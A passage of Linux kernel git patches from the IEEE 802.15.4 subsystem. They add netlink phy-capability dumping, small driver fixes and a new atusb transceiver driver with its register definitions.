"Detected %s chip version %d\n", chip, version); From 0e66545701014814360b08a7a43ca652f82b6e5a Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:53 +0200 Subject: [PATCH 094/872] nl802154: add support for dump phy capabilities This patch add support to nl802154 to dump all phy capabilities which is inside the wpan_phy_supported struct. Also we introduce a new method to dumping supported channels. The new method will offer a easier interface and has lesser netlink traffic. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/nl802154.h | 57 +++++++++++++++++++ net/ieee802154/nl802154.c | 117 +++++++++++++++++++++++++++++++++++++- 2 files changed, 173 insertions(+), 1 deletion(-) diff --git a/include/net/nl802154.h b/include/net/nl802154.h index 055277156eef..0badebd1de7f 100644 --- a/include/net/nl802154.h +++ b/include/net/nl802154.h @@ -100,6 +100,8 @@ enum nl802154_attrs { NL802154_ATTR_EXTENDED_ADDR, + NL802154_ATTR_WPAN_PHY_CAPS, + /* add attributes here, update the policy in nl802154.c */ __NL802154_ATTR_AFTER_LAST, @@ -119,6 +121,61 @@ enum nl802154_iftype { NL802154_IFTYPE_MAX = NUM_NL802154_IFTYPES - 1 }; +/** + * enum nl802154_wpan_phy_capability_attr - wpan phy capability attributes + * + * @__NL802154_CAP_ATTR_INVALID: attribute number 0 is reserved + * @NL802154_CAP_ATTR_CHANNELS: a nested attribute for nl802154_channel_attr + * @NL802154_CAP_ATTR_TX_POWERS: a nested attribute for + * nl802154_wpan_phy_tx_power + * @NL802154_CAP_ATTR_MIN_CCA_ED_LEVEL: minimum value for cca_ed_level + * @NL802154_CAP_ATTR_MAX_CCA_ED_LEVEL: maxmimum value for cca_ed_level + * @NL802154_CAP_ATTR_CCA_MODES: nl802154_cca_modes flags + * @NL802154_CAP_ATTR_CCA_OPTS: nl802154_cca_opts flags + * @NL802154_CAP_ATTR_MIN_MINBE: minimum of minbe value + * @NL802154_CAP_ATTR_MAX_MINBE: maximum of minbe value + * @NL802154_CAP_ATTR_MIN_MAXBE: minimum of maxbe value + * @NL802154_CAP_ATTR_MAX_MINBE: maximum of maxbe value + * @NL802154_CAP_ATTR_MIN_CSMA_BACKOFFS: minimum of csma backoff value + * @NL802154_CAP_ATTR_MAX_CSMA_BACKOFFS: maximum of csma backoffs value + * @NL802154_CAP_ATTR_MIN_FRAME_RETRIES: minimum of frame retries value + * @NL802154_CAP_ATTR_MAX_FRAME_RETRIES: maximum of frame retries value + * @NL802154_CAP_ATTR_IFTYPES: nl802154_iftype flags + * @NL802154_CAP_ATTR_LBT: nl802154_supported_bool_states flags + * @NL802154_CAP_ATTR_MAX: highest cap attribute currently defined + * @__NL802154_CAP_ATTR_AFTER_LAST: internal use + */ +enum nl802154_wpan_phy_capability_attr { + __NL802154_CAP_ATTR_INVALID, + + NL802154_CAP_ATTR_IFTYPES, + + NL802154_CAP_ATTR_CHANNELS, + NL802154_CAP_ATTR_TX_POWERS, + + NL802154_CAP_ATTR_CCA_ED_LEVELS, + NL802154_CAP_ATTR_CCA_MODES, + NL802154_CAP_ATTR_CCA_OPTS, + + NL802154_CAP_ATTR_MIN_MINBE, + NL802154_CAP_ATTR_MAX_MINBE, + + NL802154_CAP_ATTR_MIN_MAXBE, + NL802154_CAP_ATTR_MAX_MAXBE, + + NL802154_CAP_ATTR_MIN_CSMA_BACKOFFS, + NL802154_CAP_ATTR_MAX_CSMA_BACKOFFS, + + NL802154_CAP_ATTR_MIN_FRAME_RETRIES, + NL802154_CAP_ATTR_MAX_FRAME_RETRIES, + + NL802154_CAP_ATTR_LBT, + + /* keep last */ + __NL802154_CAP_ATTR_AFTER_LAST, + NL802154_CAP_ATTR_MAX = __NL802154_CAP_ATTR_AFTER_LAST - 1 +}; + /** * enum nl802154_cca_modes - cca modes * diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 3afb20e43ff8..54f4959fc9bb 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -225,6 +225,8 @@ static const struct nla_policy nl802154_policy[NL802154_ATTR_MAX+1] = { [NL802154_ATTR_MAX_FRAME_RETRIES] = { .type = NLA_S8, }, [NL802154_ATTR_LBT_MODE] = { .type = NLA_U8, }, + + [NL802154_ATTR_WPAN_PHY_CAPS] = { .type = NLA_NESTED }, }; /* message building helper */ @@ -235,6 +237,28 @@ static inline void *nl802154hdr_put(struct sk_buff *skb, u32 portid, u32 seq, return genlmsg_put(skb, portid, seq, &nl802154_fam, flags, cmd); } +static int +nl802154_put_flags(struct sk_buff *msg, int attr, u32 mask) +{ + struct nlattr *nl_flags = nla_nest_start(msg, attr); + int i; + + if (!nl_flags) + return -ENOBUFS; + + i = 0; + while (mask) { + if ((mask & 1) && nla_put_flag(msg, i)) + return -ENOBUFS; + + mask >>= 1; + i++; + } + + nla_nest_end(msg, nl_flags); + return 0; +} + static int nl802154_send_wpan_phy_channels(struct cfg802154_registered_device *rdev, struct sk_buff *msg) @@ -256,6 +280,92 @@ nl802154_send_wpan_phy_channels(struct cfg802154_registered_device *rdev, return 0; } +static int +nl802154_put_capabilities(struct sk_buff *msg, + struct cfg802154_registered_device *rdev) +{ + const struct wpan_phy_supported *caps = &rdev->wpan_phy.supported; + struct nlattr *nl_caps, *nl_channels; + int i; + + nl_caps = nla_nest_start(msg, NL802154_ATTR_WPAN_PHY_CAPS); + if (!nl_caps) + return -ENOBUFS; + + nl_channels = nla_nest_start(msg, NL802154_CAP_ATTR_CHANNELS); + if (!nl_channels) + return -ENOBUFS; + + for (i = 0; i <= IEEE802154_MAX_PAGE; i++) { + if (caps->channels[i]) { + if (nl802154_put_flags(msg, i, caps->channels[i])) + return -ENOBUFS; + } + } + + nla_nest_end(msg, nl_channels); + + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_ED_LEVEL) { + struct nlattr *nl_ed_lvls; + + nl_ed_lvls = nla_nest_start(msg, + NL802154_CAP_ATTR_CCA_ED_LEVELS); + if (!nl_ed_lvls) + return -ENOBUFS; + + for (i = 0; i < caps->cca_ed_levels_size; i++) { + if (nla_put_s32(msg, i, caps->cca_ed_levels[i])) + return -ENOBUFS; + } + + nla_nest_end(msg, nl_ed_lvls); + } + + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_TXPOWER) { + struct nlattr *nl_tx_pwrs; + + nl_tx_pwrs = nla_nest_start(msg, NL802154_CAP_ATTR_TX_POWERS); + if (!nl_tx_pwrs) + return -ENOBUFS; + + for (i = 0; i < caps->tx_powers_size; i++) { + if (nla_put_s32(msg, i, caps->tx_powers[i])) + return -ENOBUFS; + } + + nla_nest_end(msg, nl_tx_pwrs); + } + + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) { + if (nl802154_put_flags(msg, NL802154_CAP_ATTR_CCA_MODES, + caps->cca_modes) || + nl802154_put_flags(msg, NL802154_CAP_ATTR_CCA_OPTS, + caps->cca_opts)) + return -ENOBUFS; + } + + if (nla_put_u8(msg, NL802154_CAP_ATTR_MIN_MINBE, caps->min_minbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MAX_MINBE, caps->max_minbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MIN_MAXBE, caps->min_maxbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MAX_MAXBE, caps->max_maxbe) || + nla_put_u8(msg, NL802154_CAP_ATTR_MIN_CSMA_BACKOFFS, + caps->min_csma_backoffs) || + nla_put_u8(msg, NL802154_CAP_ATTR_MAX_CSMA_BACKOFFS, + caps->max_csma_backoffs) || + nla_put_s8(msg, NL802154_CAP_ATTR_MIN_FRAME_RETRIES, + caps->min_frame_retries) || + nla_put_s8(msg, NL802154_CAP_ATTR_MAX_FRAME_RETRIES, + caps->max_frame_retries) || + nl802154_put_flags(msg, NL802154_CAP_ATTR_IFTYPES, + caps->iftypes) || + nla_put_u32(msg, NL802154_CAP_ATTR_LBT, caps->lbt)) + return -ENOBUFS; + + nla_nest_end(msg, nl_caps); + + return 0; +} + static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, enum nl802154_commands cmd, struct sk_buff *msg, u32 portid, u32 seq, @@ -286,7 +396,9 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, rdev->wpan_phy.current_channel)) goto nla_put_failure; - /* supported channels array */ + /* TODO remove this behaviour, we still keep support it for a while + * so users can change the behaviour to the new one. + */ if (nl802154_send_wpan_phy_channels(rdev, msg)) goto nla_put_failure; @@ -309,6 +421,9 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; } + if (nl802154_put_capabilities(msg, rdev)) + goto nla_put_failure; + finish: genlmsg_end(msg, hdr); return 0; From cb97d9a3eb0be1e33db5535955e6629e800f3f0e Mon Sep 17 00:00:00 2001 From: Martin Townsend Date: Sun, 17 May 2015 21:44:54 +0200 Subject: [PATCH 095/872] mac802154: fakelb: Fix potential NULL pointer dereference. fakelb_hw_deliver creates a copy of the skb's header which can potentially return NULL so we now check for this before actually delivering to the 802.15.4 MAC layer. Signed-off-by: Martin Townsend Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 91bbf030a443..230f7da02165 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -69,7 +69,8 @@ fakelb_hw_deliver(struct fakelb_dev_priv *priv, struct sk_buff *skb) spin_lock(&priv->lock); if (priv->working) { newskb = pskb_copy(skb, GFP_ATOMIC); - ieee802154_rx_irqsafe(priv->hw, newskb, 0xcc); + if (newskb) + ieee802154_rx_irqsafe(priv->hw, newskb, 0xcc); } spin_unlock(&priv->lock); } From a2c390aa3d67f0c3a1465e246d1b7468c37abae4 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:55 +0200 Subject: [PATCH 096/872] at86rf230: fix callback for aret handling This patch fix the complete callback for going into aret on. Currently we starting after a state change into aret on again a state change into aret on which is not necessary. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 5601c743fa7b..8d5ed6e23ddb 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1013,7 +1013,7 @@ at86rf230_xmit_start(void *context) if (lp->is_tx_from_off) { lp->is_tx_from_off = false; at86rf230_async_state_change(lp, ctx, STATE_TX_ARET_ON, - at86rf230_xmit_tx_on, + at86rf230_write_frame, false); } else { at86rf230_async_state_change(lp, ctx, STATE_TX_ON, From 3862eba691e3928338e188915676dd4fa7cefcaa Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:56 +0200 Subject: [PATCH 097/872] mac802154: tx: allow xmit complete from hard irq Replace consume_skb with dev_consume_skb_any in ieee802154_xmit_complete which can be called in hard irq and other contexts. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/util.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/net/mac802154/util.c b/net/mac802154/util.c index 150bf807e572..583435f38930 100644 --- a/net/mac802154/util.c +++ b/net/mac802154/util.c @@ -85,11 +85,10 @@ void ieee802154_xmit_complete(struct ieee802154_hw *hw, struct sk_buff *skb, hrtimer_start(&local->ifs_timer, ktime_set(0, hw->phy->sifs_period * NSEC_PER_USEC), HRTIMER_MODE_REL); - - consume_skb(skb); } else { ieee802154_wake_queue(hw); - consume_skb(skb); } + + dev_consume_skb_any(skb); } EXPORT_SYMBOL(ieee802154_xmit_complete); From 7490b008d123f9bd781f51ad86b543aed49f6200 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:57 +0200 Subject: [PATCH 098/872] ieee802154: add support for atusb transceiver This patch adds support for the atusb transceiver. The current driver supports basic functionality only. Possible further tasks would be to sync functionality with the at86rf230 driver, because the atusb use internally an at86rf231 transceiver. Some of these features need a firmware update like AACK and ARET handling. I did small changes to this driver to work with xmit_async callback and setting of a random extended perm address. Signed-off-by: Alexander Aring Cc: Werner Almesberger Cc: Stefan Schmidt Cc: Richard Sharpe Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/Kconfig | 10 + drivers/net/ieee802154/Makefile | 1 + drivers/net/ieee802154/at86rf230.c | 199 +-------- drivers/net/ieee802154/at86rf230.h | 220 +++++++++ drivers/net/ieee802154/atusb.c | 692 +++++++++++++++++++++++++++++ drivers/net/ieee802154/atusb.h | 84 ++++ 6 files changed, 1009 insertions(+), 197 deletions(-) create mode 100644 drivers/net/ieee802154/at86rf230.h create mode 100644 drivers/net/ieee802154/atusb.c create mode 100644 drivers/net/ieee802154/atusb.h diff --git a/drivers/net/ieee802154/Kconfig b/drivers/net/ieee802154/Kconfig index 1a3c3e57aa0b..1dd5ab8e5054 100644 --- a/drivers/net/ieee802154/Kconfig +++ b/drivers/net/ieee802154/Kconfig @@ -53,3 +53,13 @@ config IEEE802154_CC2520 This driver can also be built as a module. To do so, say M here. the module will be called 'cc2520'. + +config IEEE802154_ATUSB + tristate "ATUSB transceiver driver" + depends on IEEE802154_DRIVERS && MAC802154 && USB + ---help--- + Say Y here to enable the ATUSB IEEE 802.15.4 wireless + controller. + + This driver can also be built as a module. To do so say M here. + The module will be called 'atusb'. diff --git a/drivers/net/ieee802154/Makefile b/drivers/net/ieee802154/Makefile index d77fa4d77e27..cf1d2a6db023 100644 --- a/drivers/net/ieee802154/Makefile +++ b/drivers/net/ieee802154/Makefile @@ -2,3 +2,4 @@ obj-$(CONFIG_IEEE802154_FAKELB) += fakelb.o obj-$(CONFIG_IEEE802154_AT86RF230) += at86rf230.o obj-$(CONFIG_IEEE802154_MRF24J40) += mrf24j40.o obj-$(CONFIG_IEEE802154_CC2520) += cc2520.o +obj-$(CONFIG_IEEE802154_ATUSB) += atusb.o diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 8d5ed6e23ddb..d417ceb67626 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -35,6 +35,8 @@ #include #include +#include "at86rf230.h" + struct at86rf230_local; /* at86rf2xx chip depend data. * All timings are in us. @@ -102,203 +104,6 @@ struct at86rf230_local { struct at86rf230_state_change tx; }; -#define RG_TRX_STATUS (0x01) -#define SR_TRX_STATUS 0x01, 0x1f, 0 -#define SR_RESERVED_01_3 0x01, 0x20, 5 -#define SR_CCA_STATUS 0x01, 0x40, 6 -#define SR_CCA_DONE 0x01, 0x80, 7 -#define RG_TRX_STATE (0x02) -#define SR_TRX_CMD 0x02, 0x1f, 0 -#define SR_TRAC_STATUS 0x02, 0xe0, 5 -#define RG_TRX_CTRL_0 (0x03) -#define SR_CLKM_CTRL 0x03, 0x07, 0 -#define SR_CLKM_SHA_SEL 0x03, 0x08, 3 -#define SR_PAD_IO_CLKM 0x03, 0x30, 4 -#define SR_PAD_IO 0x03, 0xc0, 6 -#define RG_TRX_CTRL_1 (0x04) -#define SR_IRQ_POLARITY 0x04, 0x01, 0 -#define SR_IRQ_MASK_MODE 0x04, 0x02, 1 -#define SR_SPI_CMD_MODE 0x04, 0x0c, 2 -#define SR_RX_BL_CTRL 0x04, 0x10, 4 -#define SR_TX_AUTO_CRC_ON 0x04, 0x20, 5 -#define SR_IRQ_2_EXT_EN 0x04, 0x40, 6 -#define SR_PA_EXT_EN 0x04, 0x80, 7 -#define RG_PHY_TX_PWR (0x05) -#define SR_TX_PWR_23X 0x05, 0x0f, 0 -#define SR_PA_LT_230 0x05, 0x30, 4 -#define SR_PA_BUF_LT_230 0x05, 0xc0, 6 -#define SR_TX_PWR_212 0x05, 0x1f, 0 -#define SR_GC_PA_212 0x05, 0x60, 5 -#define SR_PA_BOOST_LT_212 0x05, 0x80, 7 -#define RG_PHY_RSSI (0x06) -#define SR_RSSI 0x06, 0x1f, 0 -#define SR_RND_VALUE 0x06, 0x60, 5 -#define SR_RX_CRC_VALID 0x06, 0x80, 7 -#define RG_PHY_ED_LEVEL (0x07) -#define SR_ED_LEVEL 0x07, 0xff, 0 -#define RG_PHY_CC_CCA (0x08) -#define SR_CHANNEL 0x08, 0x1f, 0 -#define SR_CCA_MODE 0x08, 0x60, 5 -#define SR_CCA_REQUEST 0x08, 0x80, 7 -#define RG_CCA_THRES (0x09) -#define SR_CCA_ED_THRES 0x09, 0x0f, 0 -#define SR_RESERVED_09_1 0x09, 0xf0, 4 -#define RG_RX_CTRL (0x0a) -#define SR_PDT_THRES 0x0a, 0x0f, 0 -#define SR_RESERVED_0a_1 0x0a, 0xf0, 4 -#define RG_SFD_VALUE (0x0b) -#define SR_SFD_VALUE 0x0b, 0xff, 0 -#define RG_TRX_CTRL_2 (0x0c) -#define SR_OQPSK_DATA_RATE 0x0c, 0x03, 0 -#define SR_SUB_MODE 0x0c, 0x04, 2 -#define SR_BPSK_QPSK 0x0c, 0x08, 3 -#define SR_OQPSK_SUB1_RC_EN 0x0c, 0x10, 4 -#define SR_RESERVED_0c_5 0x0c, 0x60, 5 -#define SR_RX_SAFE_MODE 0x0c, 0x80, 7 -#define RG_ANT_DIV (0x0d) -#define SR_ANT_CTRL 0x0d, 0x03, 0 -#define SR_ANT_EXT_SW_EN 0x0d, 0x04, 2 -#define SR_ANT_DIV_EN 0x0d, 0x08, 3 -#define SR_RESERVED_0d_2 0x0d, 0x70, 4 -#define SR_ANT_SEL 0x0d, 0x80, 7 -#define RG_IRQ_MASK (0x0e) -#define SR_IRQ_MASK 0x0e, 0xff, 0 -#define RG_IRQ_STATUS (0x0f) -#define SR_IRQ_0_PLL_LOCK 0x0f, 0x01, 0 -#define SR_IRQ_1_PLL_UNLOCK 0x0f, 0x02, 1 -#define SR_IRQ_2_RX_START 0x0f, 0x04, 2 -#define SR_IRQ_3_TRX_END 0x0f, 0x08, 3 -#define SR_IRQ_4_CCA_ED_DONE 0x0f, 0x10, 4 -#define SR_IRQ_5_AMI 0x0f, 0x20, 5 -#define SR_IRQ_6_TRX_UR 0x0f, 0x40, 6 -#define SR_IRQ_7_BAT_LOW 0x0f, 0x80, 7 -#define RG_VREG_CTRL (0x10) -#define SR_RESERVED_10_6 0x10, 0x03, 0 -#define SR_DVDD_OK 0x10, 0x04, 2 -#define SR_DVREG_EXT 0x10, 0x08, 3 -#define SR_RESERVED_10_3 0x10, 0x30, 4 -#define SR_AVDD_OK 0x10, 0x40, 6 -#define SR_AVREG_EXT 0x10, 0x80, 7 -#define RG_BATMON (0x11) -#define SR_BATMON_VTH 0x11, 0x0f, 0 -#define SR_BATMON_HR 0x11, 0x10, 4 -#define SR_BATMON_OK 0x11, 0x20, 5 -#define SR_RESERVED_11_1 0x11, 0xc0, 6 -#define RG_XOSC_CTRL (0x12) -#define SR_XTAL_TRIM 0x12, 0x0f, 0 -#define SR_XTAL_MODE 0x12, 0xf0, 4 -#define RG_RX_SYN (0x15) -#define SR_RX_PDT_LEVEL 0x15, 0x0f, 0 -#define SR_RESERVED_15_2 0x15, 0x70, 4 -#define SR_RX_PDT_DIS 0x15, 0x80, 7 -#define RG_XAH_CTRL_1 (0x17) -#define SR_RESERVED_17_8 0x17, 0x01, 0 -#define SR_AACK_PROM_MODE 0x17, 0x02, 1 -#define SR_AACK_ACK_TIME 0x17, 0x04, 2 -#define SR_RESERVED_17_5 0x17, 0x08, 3 -#define SR_AACK_UPLD_RES_FT 0x17, 0x10, 4 -#define SR_AACK_FLTR_RES_FT 0x17, 0x20, 5 -#define SR_CSMA_LBT_MODE 0x17, 0x40, 6 -#define SR_RESERVED_17_1 0x17, 0x80, 7 -#define RG_FTN_CTRL (0x18) -#define SR_RESERVED_18_2 0x18, 0x7f, 0 -#define SR_FTN_START 0x18, 0x80, 7 -#define RG_PLL_CF (0x1a) -#define SR_RESERVED_1a_2 0x1a, 0x7f, 0 -#define SR_PLL_CF_START 0x1a, 0x80, 7 -#define RG_PLL_DCU (0x1b) -#define SR_RESERVED_1b_3 0x1b, 0x3f, 0 -#define SR_RESERVED_1b_2 0x1b, 0x40, 6 -#define SR_PLL_DCU_START 0x1b, 0x80, 7 -#define RG_PART_NUM (0x1c) -#define SR_PART_NUM 0x1c, 0xff, 0 -#define RG_VERSION_NUM (0x1d) -#define SR_VERSION_NUM 0x1d, 0xff, 0 -#define RG_MAN_ID_0 (0x1e) -#define SR_MAN_ID_0 0x1e, 0xff, 0 -#define RG_MAN_ID_1 (0x1f) -#define SR_MAN_ID_1 0x1f, 0xff, 0 -#define RG_SHORT_ADDR_0 (0x20) -#define SR_SHORT_ADDR_0 0x20, 0xff, 0 -#define RG_SHORT_ADDR_1 (0x21) -#define SR_SHORT_ADDR_1 0x21, 0xff, 0 -#define RG_PAN_ID_0 (0x22) -#define SR_PAN_ID_0 0x22, 0xff, 0 -#define RG_PAN_ID_1 (0x23) -#define SR_PAN_ID_1 0x23, 0xff, 0 -#define RG_IEEE_ADDR_0 (0x24) -#define SR_IEEE_ADDR_0 0x24, 0xff, 0 -#define RG_IEEE_ADDR_1 (0x25) -#define SR_IEEE_ADDR_1 0x25, 0xff, 0 -#define RG_IEEE_ADDR_2 (0x26) -#define SR_IEEE_ADDR_2 0x26, 0xff, 0 -#define RG_IEEE_ADDR_3 (0x27) -#define SR_IEEE_ADDR_3 0x27, 0xff, 0 -#define RG_IEEE_ADDR_4 (0x28) -#define SR_IEEE_ADDR_4 0x28, 0xff, 0 -#define RG_IEEE_ADDR_5 (0x29) -#define SR_IEEE_ADDR_5 0x29, 0xff, 0 -#define RG_IEEE_ADDR_6 (0x2a) -#define SR_IEEE_ADDR_6 0x2a, 0xff, 0 -#define RG_IEEE_ADDR_7 (0x2b) -#define SR_IEEE_ADDR_7 0x2b, 0xff, 0 -#define RG_XAH_CTRL_0 (0x2c) -#define SR_SLOTTED_OPERATION 0x2c, 0x01, 0 -#define SR_MAX_CSMA_RETRIES 0x2c, 0x0e, 1 -#define SR_MAX_FRAME_RETRIES 0x2c, 0xf0, 4 -#define RG_CSMA_SEED_0 (0x2d) -#define SR_CSMA_SEED_0 0x2d, 0xff, 0 -#define RG_CSMA_SEED_1 (0x2e) -#define SR_CSMA_SEED_1 0x2e, 0x07, 0 -#define SR_AACK_I_AM_COORD 0x2e, 0x08, 3 -#define SR_AACK_DIS_ACK 0x2e, 0x10, 4 -#define SR_AACK_SET_PD 0x2e, 0x20, 5 -#define SR_AACK_FVN_MODE 0x2e, 0xc0, 6 -#define RG_CSMA_BE (0x2f) -#define SR_MIN_BE 0x2f, 0x0f, 0 -#define SR_MAX_BE 0x2f, 0xf0, 4 - -#define CMD_REG 0x80 -#define CMD_REG_MASK 0x3f -#define CMD_WRITE 0x40 -#define CMD_FB 0x20 - -#define IRQ_BAT_LOW (1 << 7) -#define IRQ_TRX_UR (1 << 6) -#define IRQ_AMI (1 << 5) -#define IRQ_CCA_ED (1 << 4) -#define IRQ_TRX_END (1 << 3) -#define IRQ_RX_START (1 << 2) -#define IRQ_PLL_UNL (1 << 1) -#define IRQ_PLL_LOCK (1 << 0) - -#define IRQ_ACTIVE_HIGH 0 -#define IRQ_ACTIVE_LOW 1 - -#define STATE_P_ON 0x00 /* BUSY */ -#define STATE_BUSY_RX 0x01 -#define STATE_BUSY_TX 0x02 -#define STATE_FORCE_TRX_OFF 0x03 -#define STATE_FORCE_TX_ON 0x04 /* IDLE */ -/* 0x05 */ /* INVALID_PARAMETER */ -#define STATE_RX_ON 0x06 -/* 0x07 */ /* SUCCESS */ -#define STATE_TRX_OFF 0x08 -#define STATE_TX_ON 0x09 -/* 0x0a - 0x0e */ /* 0x0a - UNSUPPORTED_ATTRIBUTE */ -#define STATE_SLEEP 0x0F -#define STATE_PREP_DEEP_SLEEP 0x10 -#define STATE_BUSY_RX_AACK 0x11 -#define STATE_BUSY_TX_ARET 0x12 -#define STATE_RX_AACK_ON 0x16 -#define STATE_TX_ARET_ON 0x19 -#define STATE_RX_ON_NOCLK 0x1C -#define STATE_RX_AACK_ON_NOCLK 0x1D -#define STATE_BUSY_RX_AACK_NOCLK 0x1E -#define STATE_TRANSITION_IN_PROGRESS 0x1F - -#define TRX_STATE_MASK (0x1F) - #define AT86RF2XX_NUMREGS 0x3F static void diff --git a/drivers/net/ieee802154/at86rf230.h b/drivers/net/ieee802154/at86rf230.h new file mode 100644 index 000000000000..1e6d1cc677f6 --- /dev/null +++ b/drivers/net/ieee802154/at86rf230.h @@ -0,0 +1,220 @@ +/* + * AT86RF230/RF231 driver + * + * Copyright (C) 2009-2012 Siemens AG + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * Written by: + * Dmitry Eremin-Solenikov + * Alexander Smirnov + */ + +#ifndef _AT86RF230_H +#define _AT86RF230_H + +#define RG_TRX_STATUS (0x01) +#define SR_TRX_STATUS 0x01, 0x1f, 0 +#define SR_RESERVED_01_3 0x01, 0x20, 5 +#define SR_CCA_STATUS 0x01, 0x40, 6 +#define SR_CCA_DONE 0x01, 0x80, 7 +#define RG_TRX_STATE (0x02) +#define SR_TRX_CMD 0x02, 0x1f, 0 +#define SR_TRAC_STATUS 0x02, 0xe0, 5 +#define RG_TRX_CTRL_0 (0x03) +#define SR_CLKM_CTRL 0x03, 0x07, 0 +#define SR_CLKM_SHA_SEL 0x03, 0x08, 3 +#define SR_PAD_IO_CLKM 0x03, 0x30, 4 +#define SR_PAD_IO 0x03, 0xc0, 6 +#define RG_TRX_CTRL_1 (0x04) +#define SR_IRQ_POLARITY 0x04, 0x01, 0 +#define SR_IRQ_MASK_MODE 0x04, 0x02, 1 +#define SR_SPI_CMD_MODE 0x04, 0x0c, 2 +#define SR_RX_BL_CTRL 0x04, 0x10, 4 +#define SR_TX_AUTO_CRC_ON 0x04, 0x20, 5 +#define SR_IRQ_2_EXT_EN 0x04, 0x40, 6 +#define SR_PA_EXT_EN 0x04, 0x80, 7 +#define RG_PHY_TX_PWR (0x05) +#define SR_TX_PWR_23X 0x05, 0x0f, 0 +#define SR_PA_LT_230 0x05, 0x30, 4 +#define SR_PA_BUF_LT_230 0x05, 0xc0, 6 +#define SR_TX_PWR_212 0x05, 0x1f, 0 +#define SR_GC_PA_212 0x05, 0x60, 5 +#define SR_PA_BOOST_LT_212 0x05, 0x80, 7 +#define RG_PHY_RSSI (0x06) +#define SR_RSSI 0x06, 0x1f, 0 +#define SR_RND_VALUE 0x06, 0x60, 5 +#define SR_RX_CRC_VALID 0x06, 0x80, 7 +#define RG_PHY_ED_LEVEL (0x07) +#define SR_ED_LEVEL 0x07, 0xff, 0 +#define RG_PHY_CC_CCA (0x08) +#define SR_CHANNEL 0x08, 0x1f, 0 +#define SR_CCA_MODE 0x08, 0x60, 5 +#define SR_CCA_REQUEST 0x08, 0x80, 7 +#define RG_CCA_THRES (0x09) +#define SR_CCA_ED_THRES 0x09, 0x0f, 0 +#define SR_RESERVED_09_1 0x09, 0xf0, 4 +#define RG_RX_CTRL (0x0a) +#define SR_PDT_THRES 0x0a, 0x0f, 0 +#define SR_RESERVED_0a_1 0x0a, 0xf0, 4 +#define RG_SFD_VALUE (0x0b) +#define SR_SFD_VALUE 0x0b, 0xff, 0 +#define RG_TRX_CTRL_2 (0x0c) +#define SR_OQPSK_DATA_RATE 0x0c, 0x03, 0 +#define SR_SUB_MODE 0x0c, 0x04, 2 +#define SR_BPSK_QPSK 0x0c, 0x08, 3 +#define SR_OQPSK_SUB1_RC_EN 0x0c, 0x10, 4 +#define SR_RESERVED_0c_5 0x0c, 0x60, 5 +#define SR_RX_SAFE_MODE 0x0c, 0x80, 7 +#define RG_ANT_DIV (0x0d) +#define SR_ANT_CTRL 0x0d, 0x03, 0 +#define SR_ANT_EXT_SW_EN 0x0d, 0x04, 2 +#define SR_ANT_DIV_EN 0x0d, 0x08, 3 +#define SR_RESERVED_0d_2 0x0d, 0x70, 4 +#define SR_ANT_SEL 0x0d, 0x80, 7 +#define RG_IRQ_MASK (0x0e) +#define SR_IRQ_MASK 0x0e, 0xff, 0 +#define RG_IRQ_STATUS (0x0f) +#define SR_IRQ_0_PLL_LOCK 0x0f, 0x01, 0 +#define SR_IRQ_1_PLL_UNLOCK 0x0f, 0x02, 1 +#define SR_IRQ_2_RX_START 0x0f, 0x04, 2 +#define SR_IRQ_3_TRX_END 0x0f, 0x08, 3 +#define SR_IRQ_4_CCA_ED_DONE 0x0f, 0x10, 4 +#define SR_IRQ_5_AMI 0x0f, 0x20, 5 +#define SR_IRQ_6_TRX_UR 0x0f, 0x40, 6 +#define SR_IRQ_7_BAT_LOW 0x0f, 0x80, 7 +#define RG_VREG_CTRL (0x10) +#define SR_RESERVED_10_6 0x10, 0x03, 0 +#define SR_DVDD_OK 0x10, 0x04, 2 +#define SR_DVREG_EXT 0x10, 0x08, 3 +#define SR_RESERVED_10_3 0x10, 0x30, 4 +#define SR_AVDD_OK 0x10, 0x40, 6 +#define SR_AVREG_EXT 0x10, 0x80, 7 +#define RG_BATMON (0x11) +#define SR_BATMON_VTH 0x11, 0x0f, 0 +#define SR_BATMON_HR 0x11, 0x10, 4 +#define SR_BATMON_OK 0x11, 0x20, 5 +#define SR_RESERVED_11_1 0x11, 0xc0, 6 +#define 